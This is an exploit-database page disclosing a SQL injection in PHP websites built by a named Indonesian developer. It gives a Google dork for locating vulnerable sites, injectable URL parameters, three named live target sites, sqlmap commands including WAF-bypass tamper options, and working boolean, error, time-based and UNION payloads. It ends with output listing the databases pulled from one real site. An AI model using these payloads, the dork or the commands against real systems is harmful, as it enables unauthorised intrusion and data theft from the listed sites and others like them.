Website Developed by Irsyadi Siradjuddin Indonesian Riau SQL Injection

2020.09.21
id Mr.Gagaltotal666 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:Developed by Irsyadi Siradjuddin

# Exploit Title: Website Developed by Irsyadi Siradjuddin SQL Injection # Google Dork: intext:Developed by Irsyadi Siradjuddin # Date: 2020.05.05 # Exploit Author: Mr.Gagaltotal666 - gagaltotal.github.io # Vendor Homepage: https://irsyadi.com/ # Version PHP : PHP 5 # Tested on: BackBox 6 GNU/Linux # CVE : N/A POC : - www.target.com/berita_detail.php?ID=1[SQLi]['] - www.target.com/beritadtl.php?judul=hlm=1308[SQLi]['] Demo Target : - https://yapensa.or.id/berita_detail.php?ID=1 - https://www.jasuda.net/beritadtl.php?judul=Potensi,%20Produksi,%20dan%20Prospek%20Rumput%20Laut%20di%20Indonesia&hlm=1308 - https://agrotekuin.com/matakuliah_rps.php?ID=83 Poc SQLMAP : - sqlmap -u "example.com" --dbs - Bypass WAF : sqlmap -u "example.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=1' AND 1151=1151 AND 'uCJd'='uCJd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ID=1' AND (SELECT 4748 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT (ELT(4748=4748,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ndfp'='Ndfp Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ID=1' AND (SELECT 5294 FROM (SELECT(SLEEP(5)))PzWV) AND 'VsvN'='VsvN Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: ID=1' UNION ALL SELECT CONCAT(0x7170707a71,0x48485649454161426e6b7a756c524a5342706a644d415252704a6e5a66676d685a6669525142786c,0x71786b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [09:18:59] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 [09:19:00] [INFO] fetching database names available databases [2]: [*] h02087_yapensa [*] information_schema

References:

referensi protect website SQL Injection :
https://www.gagaltotal666.my.id/2018/12/cara-sederhana-mencegah-serangan-sql.html


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top